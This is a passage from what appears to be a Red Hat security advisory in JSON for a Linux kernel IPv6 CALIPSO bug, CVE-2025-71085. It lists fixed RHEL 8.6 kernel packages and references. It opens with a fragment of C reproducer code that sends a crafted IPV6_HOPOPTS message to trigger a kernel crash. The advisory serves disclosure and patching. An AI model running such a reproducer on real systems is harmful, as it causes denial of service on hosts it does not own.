cmsghdr *) calloc(1,\n                        sizeof(struct cmsghdr) + cmsg_len);\n        msg.msg_name = \u0026dest_addr;\n        msg.msg_namelen = sizeof(dest_addr);\n        msg.msg_iov = NULL;\n        msg.msg_iovlen = 0;\n        msg.msg_control = cmsg;\n        msg.msg_controllen = cmsg_len;\n        msg.msg_flags = 0;\n\n        // setup sockaddr\n        dest_addr.sin6_family = AF_INET6;\n        dest_addr.sin6_port = htons(31337);\n        dest_addr.sin6_flowinfo = htonl(31337);\n        dest_addr.sin6_addr = in6addr_loopback;\n        dest_addr.sin6_scope_id = 31337;\n\n        // setup cmsghdr\n        cmsg-\u003ecmsg_len = cmsg_len;\n        cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n        cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n        char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n        hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n        sendmsg(fd, \u0026msg, 0);",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This vulnerability allows an unprivileged user to trigger a kernel BUG by causing an integer overflow in the headroom calculation used by skb_cow(), which results in a negative size passed to pskb_expand_head(). The kernel subsequently hits a reachable BUG_ON() and crashes, leading to a reliable denial-of-service condition. In worst-case scenarios, this path may be reachable via crafted IPv6 traffic with CALIPSO options.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-71085"
        },
        {
          "category": "external",
          "summary": "RHBZ#2429026",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429026"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-71085",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-71085",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71085"
        },
        {
          "category": "external",
          "summary": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/T",
          "url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/T"
        }
      ],
      "release_date": "2026-01-13T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-03-25T00:45:50+00:00",
          "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
          "product_ids": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
